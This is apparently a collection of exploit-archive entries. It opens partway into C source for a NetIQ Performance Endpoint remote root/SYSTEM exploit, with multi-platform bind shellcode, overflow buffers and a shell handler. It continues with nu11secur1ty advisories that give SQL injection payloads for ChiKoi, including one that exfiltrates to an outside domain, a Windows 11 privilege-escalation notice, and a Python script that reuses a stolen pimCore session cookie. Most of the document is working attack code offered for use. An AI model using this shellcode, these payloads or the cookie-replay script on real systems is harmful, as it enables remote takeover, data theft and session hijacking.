"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x41\x41\x41\x41\x41\x41" /* */
"\x00\x00\x00\x01" /* */
"\x00\x00\x00\x02" /* 218h */
"\x00" /* */
"\x01" /* 1ACh */
"\x00\x00" /* */
"\x00" /* 254h */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf1_end[] =
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf2[] =
"\x06" /* ENDPT_COMMAND_SETUP_E1 */
"\x07\x14\x43\x1A" /* verify_get_id (1) */
"\x00\x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x69" /* 210h */
"\x00\x00\x00\x69" /* var_C */
"\x00\x02" /* */
"\x00\x00\x00\x69" /* var_C */
"\x00\x00\x00\x69" /* 218h */
"\x69" /* */
"\x01" /* 1ACh */
"\x00\x00" /* */
"\x69" /* 254h */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf2_end[] =
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x69" /* 0A8h */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char cpkt_buf1[] =
"\x07"
"AAAA";
static char cpkt_buf2[] =
"\x38"
"\x00\x04"
"AAAA";
static char x86_evil_len[] =
"\x11\xc0"; /* adc eax, eax */
#define X86_NOP_BYTE 0x90 /* nop */
static char sparc_evil_len[] =
"\x10\x80\x00\x3c"; /* ba */
static char sparc_nop[] =
"\x01\x00\x00\x00"; /* nop */
static char hammer_buf[] =
"\x00\x25\x38"
"\x00\x20"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";
static char win32_x86_bind[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e"
"\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5"
"\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1"
"\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3"
"\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02"
"\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1"
"\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1"
"\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a"
"\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa"
"\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28"
"\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79"
"\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb"
"\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42"
"\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63"
"\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d"
"\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a"
"\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07"
"\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5"
"\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b"
"\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa"
"\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a"
"\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a";
static char freebsd_x86_bind[] =
"\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42"
"\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0"
"\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a"
"\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80";
static char solaris_sparc_bind[] =
"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b"
"\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08"
"\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0"
"\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8"
"\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9"
"\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09"
"\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03"
"\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08"
"\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a"
"\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08"
"\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b"
"\x91\xd0\x20\x08";
static char solaris_x86_bind[] =
"\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52"
"\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6"
"\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0"
"\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51"
"\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4"
"\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91";
#define NUM_TARGETS 7
#define ARCH_X86 0
#define ARCH_SPARC 1
struct target_t
{
const char *name;
const char *zshell;
const int zshell_len;
const int zshell_pkt_len;
const int fp_indx;
const int fp_offset;
const int arch;
};
struct target_t targets[] = {
{ "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
{ "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - FreeBSD (universal)",
freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 },
{ "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC },
{ "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 },
{0}
};
static const char *quotes[] = {
" \"No executable code (like Java or Visual Basic) is sent. There is no way\n"
" to do something like 'run this command.' 100,000’s of endpoints have been\n"
" installed worldwide without incident.\"",
" \"Endpoints do rigorous internal validation. For example, endpoints are not\n"
" susceptible to 'buffer overrun' attacks used by hackers.\""
};
static int verbose = 1; /* verbosity */
static int ppid, cpid; /* parent and child process id's */
static int get_localip_getifaddrs (in_addr_t *);
static int sock_send (int, char *, int);
static int sock_recv (int, char *, int);
static int sock_recv_str (int, char *, int);
static void shellami (int);
static void
fatal (void)
{
kill (0, SIGKILL);
exit (EXIT_FAILURE);
}
static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
struct ifaddrs *ifa_head;
int result;
result = -1;
if (getifaddrs (&ifa_head) == 0)
{
struct ifaddrs *ifa_cur;
for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
{
if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
{
if (ifa_cur->ifa_addr->sa_family != AF_INET ||
!(ifa_cur->ifa_flags & IFF_UP))
continue;
if (ifa_cur->ifa_flags & IFF_LOOPBACK)
continue;
memcpy (ip_addr,
&((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr,
sizeof *ip_addr);
result = 0;
break;
}
}
freeifaddrs (ifa_head);
}
return (result);
}
static int
sock_send (int fd, char *src, int len)
{
int n;
if ((n = send (fd, src, len, 0)) < 0)
{
perror ("send()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv (int fd, char *dst, int len)
{
int n;
if ((n = recv (fd, dst, len, 0)) < 0)
{
perror ("recv()");
exit (EXIT_FAILURE);
}
return (n);
}
static int
sock_recv_str (int fd, char *dst, int len)
{
int n = sock_recv (fd, dst, len - 1);
dst[n] = '\0';
return (n);
}
static void
shellami (int fd)
{
int n;
fd_set rset;
char rbuf[1024];
while (1)
{
FD_ZERO (&rset);
FD_SET (fd, &rset);
FD_SET (STDIN_FILENO, &rset);
if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
{
perror ("select()");
fatal ();
}
if (FD_ISSET (fd, &rset))
{
if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
{
fprintf (stderr, "Connection closed by foreign host.\n");
exit (EXIT_SUCCESS);
}
printf ("%s", rbuf);
fflush (stdout);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
{
rbuf[n] = '\0';
sock_send (fd, rbuf, n);
}
}
}
}
static int
sockami (char *host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int fd;
fflush (stdout);
if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (EXIT_FAILURE);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (EXIT_FAILURE);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
{
perror ("connect()");
return (-1);
}
return (fd);
}
int
endpt_add_string (char *buf, char *str)
{
unsigned int str_len;
unsigned short str_lens;
assert (buf != NULL && str != NULL);
str_len = 2 + strlen (str) + 1;
str_lens = htons (str_len);
/* add the string length and copy, including NULL */
*((unsigned short *) buf) = str_lens;
memcpy (buf + 2, str, str_len - 2);
return (str_len);
}
char *
endpt_read_packet (int fd, char *buf)
{
unsigned short pkt_len;
int n;
n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len);
if (n < 2)
{
fprintf (stderr, "endpt_read_packet: failed reading length!\n");
return (NULL);
}
pkt_len = ntohs (pkt_len);
if (pkt_len > ENDPT_PKTMAX)
{
fprintf (stderr, "endpt_read_packet: invalid packet length!\n");
return (NULL);
}
n = sock_recv (fd, buf, pkt_len - 2);
if (n < pkt_len - 2)
{
fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n", n, pkt_len);
return (NULL);
}
return (buf);
}
char *
endpt_create_packet (char *buf, unsigned int len)
{
char *pkt_buf;
unsigned int pkt_len;
unsigned short pkt_lens;
assert (buf != NULL && len > 0);
assert (len <= UINT_MAX - 2);
assert (len <= ENDPT_PKTMAX - 2);
pkt_len = 2 + len;
pkt_buf = malloc (pkt_len * sizeof (char));
if (pkt_buf == NULL)
return (NULL);
pkt_lens = htons (pkt_len);
/* add the packet length and copy */
*((unsigned short *) pkt_buf) = pkt_lens;
memcpy (pkt_buf + 2, buf, len);
return (pkt_buf);
}
void
endpt_listen_child (char *thost, struct target_t *trgt)
{
struct sockaddr_in servaddr, cliaddr;
char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
unsigned int var_30_ptr;
int lfd, cfd, sfd, pid;
socklen_t clilen;
sleep (1);
pid = getpid ();
if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror ("socket()");
fatal ();
}
memset (&servaddr, 0, sizeof servaddr);
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl (INADDR_ANY);
servaddr.sin_port = htons (ENDPT_TCP_PORT);
if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0)
{
perror ("bind()");
fatal ();
}
if (listen (lfd, 2) < 0)
{
perror ("listen()");
fatal ();
}
clilen = sizeof cliaddr;
if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0)
{
perror ("accept()");
fatal ();
}
printf ("[child-%d] connection accepted from %s:%d\n",
pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port));
printf ("[child-%d] reading first packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] sending first reply...", pid);
pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1);
sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2);
free (pkt_ptr);
printf ("done\n");
printf ("[child-%d] reading second packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] reading third packet...", pid);
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
printf ("done\n");
printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);
printf ("[child-%d] reading fourth packet...", pid);
/* read dummy packet */
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
printf ("done\n");
printf ("[child-%d] reading fifth packet...", pid);
if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL)
{
close (cfd);
fatal ();
}
memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr);
printf ("done\n");
printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr);
memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr);
printf ("[child-%d] sending second reply...", pid);
pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1);
sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2);
free (pkt_ptr);
printf ("done\n");
printf ("[child-%d] sending evil buffer...", pid);
ptr = pkt_buf;
if (trgt->arch == ARCH_X86)
{
memcpy (ptr, x86_evil_len, sizeof x86_evil_len);
ptr += sizeof x86_evil_len - 1;
memset (ptr, X86_NOP_BYTE, 0x11c0 - 2);
}
else if (trgt->arch == ARCH_SPARC)
{
int i;
for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1)
memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len);
for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1)
memcpy (ptr, sparc_nop, sizeof sparc_nop);
}
else
{
fprintf (stderr, "opps\n");
exit (EXIT_FAILURE);
}
memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1);
sock_send (cfd, pkt_buf, trgt->zshell_pkt_len);
printf ("done\n");
printf ("[child-%d] sending hammer buffer...", pid);
ptr = pkt_buf;
memcpy (ptr, hammer_buf, sizeof hammer_buf);
memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr);
if (trgt->arch == ARCH_SPARC)
var_30_ptr = ntohl (var_30_ptr);
var_30_ptr -= trgt->fp_offset - 0x08;
if (trgt->arch == ARCH_SPARC)
var_30_ptr = htonl (var_30_ptr);
memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr);
sock_send (cfd, pkt_buf, sizeof hammer_buf - 1);
printf ("done\n");
printf ("[child-%d] waiting for the shellcode to be executed...\n", pid);
sleep (3);
if ((sfd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (sfd);
}
sleep (1);
close (cfd);
}
void
endpt_parent (char *thost)
{
struct in_addr ip_addr;
char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr;
int fd;
get_localip_getifaddrs (&ip_addr.s_addr);
strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf);
ip_buf[sizeof ip_buf - 1] = '\0';
if (verbose)
fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf);
fflush (stdout);
printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT);
if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0)
fatal ();
printf ("done\n");
printf ("[parent-%d] building first packet...", ppid);
ptr = pkt_buf;
memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1);
ptr += sizeof ppkt_buf1 - 1;
/* add the connect-back IP */
ptr += endpt_add_string (ptr, ip_buf);
memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end);
ptr += sizeof ppkt_buf1_end - 1;
pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
printf ("done\n");
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
free (pkt_ptr);
printf ("[parent-%d] building second packet...", ppid);
ptr = pkt_buf;
memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2);
ptr += sizeof ppkt_buf2 - 1;
/* add the connect-back IP */
ptr += endpt_add_string (ptr, ip_buf);
memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end);
ptr += sizeof ppkt_buf2_end - 1;
pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf);
printf ("done\n");
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
printf ("[parent-%d] building third packet...done\n", ppid);
sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2);
free (pkt_ptr);
sleep (2);
printf ("[parent-%d] closing socket...done\n", ppid);
close (fd);
}
int
main (int argc, char **argv)
{
struct target_t *trgt;
int i, cret;
printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if (argc <= 2)
{
fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
for (i = 0; targets[i].name; i++)
fprintf (stderr, "\t%d) %s\n", i, targets[i].name);
fprintf (stderr, "\n");
exit (EXIT_SUCCESS);
}
if (atoi (argv[2]) >= NUM_TARGETS)
{
fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
exit (EXIT_SUCCESS);
}
trgt = &targets[atoi (argv[2])];
printf ("Target: %s\n\n", trgt->name);
srand (time (NULL));
printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]);
ppid = getpid ();
if ((cpid = fork ()) < 0)
{
perror ("fark()");
exit (EXIT_FAILURE);
}
else if (cpid == 0)
{
/* child */
endpt_listen_child (argv[1], trgt);
exit (EXIT_SUCCESS);
}
/* parent */
endpt_parent (argv[1]);
/* wait for child */
wait (&cret);
if (verbose)
fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret);
return (EXIT_SUCCESS);
}
## Title: ChiKoi-1.0 SQLi
## Author: nu11secur1ty
## Date: 01.12.2023
## Vendor: https://chikoiquan.tanhongit.com/
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi
## Description:
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'
was submitted in the User-Agent HTTP header.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The attacker can steal all information from this system and can
seriously harm the users of this system,
such as extracting bank accounts through which they pay each other, etc.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND
9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION
SELECT 6994) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND
(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT
(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR
---
```
[+] Online:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)
Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND
8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION
SELECT 6426) END))-- -
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)
## Proof and Exploit:
[href](https://streamable.com/7x69yz)
## Time spent
`01:30:00`
## Writing an exploit
`00:05:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
## Title: Windows 11 10.0.22000 - Backup service Privilege Escalation
## Author: nu11secur1ty
## Date: 01.13.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/software-download/windows11
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752
## Description:
Windows 11 Pro build 10.0.22000 Build 22000 suffers from Backup
service - Privilege Escalation vulnerability.
An attacker who successfully exploited this vulnerability could gain
SYSTEM privileges.
and could delete data that could include data that results in the
service being unavailable.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752)
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC)
## Proof and Exploit:
[href](https://streamable.com/f2dl3m)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html https://0day.today/
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
## Exploit Title: pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute
## Author: nu11secur1ty
## Date: 01.11.2023
## Vendor: https://pimcore.com/en
## Software: https://packagist.org/packages/pimcore/skeleton
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton
## Description:
The pimCore-5.4.18-skeleton suffers from Sensitive Cookie with
Improper SameSite Attribute vulnerability - PHPSESSID cookie Session
management connection requests are not sanitizing correctly.
There are no securing changes in PHPSESSID cookies for every request -
validating sessions and changing a cookie for every connection - POST
Request.
The attacker in the same network can trick the user - the
administrator of this system and can steal his cookie,
then he can make very evil things by using the same session from the
name of the already authenticated user - administrator, on a couple of
PCs with different IPs which are used from different machines into
that network.
When the attacker steals the cookie, he can manipulate the same
session, for example, he can log out or do very malicious stuff.
This is a very stupid developer's error, and this can be very
dangerous for the owner of the system.
The attack is possible also in the external network!
## STATUS: HIGH Vulnerability
[+] Payload:
```Python
#!/usr/bin/python3
# @nu11secur1ty 2023
import time
from selenium import webdriver
driver = webdriver.Chrome()
print("Give the stolen cookie...\n")
cookie = input()
print("Give the domain or IP of the owner of the cookie...\n")
target = input()
driver.maximize_window()
driver.get(target+ 'admin/?_dc=1673370965&perspective=')
driver.add_cookie({'name': 'PHPSESSID', 'value': cookie})
print(driver.get_cookie('PHPSESSID'))
driver.get(target+ 'admin/?_dc=1673370965&perspective=')
time.sleep(3)
print("Press any key to stop the exploit...\n")
input()
print("Your PHPSESSID is PWNED")
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pimcore/pimCore-5.4.18-skeleton)
## Reference:
[href](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions)
## Proof and Exploit:
[href](https://streamable.com/lorw8x)
## Time spent
`03:00:00`
## Writing an exploit
`00:25:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>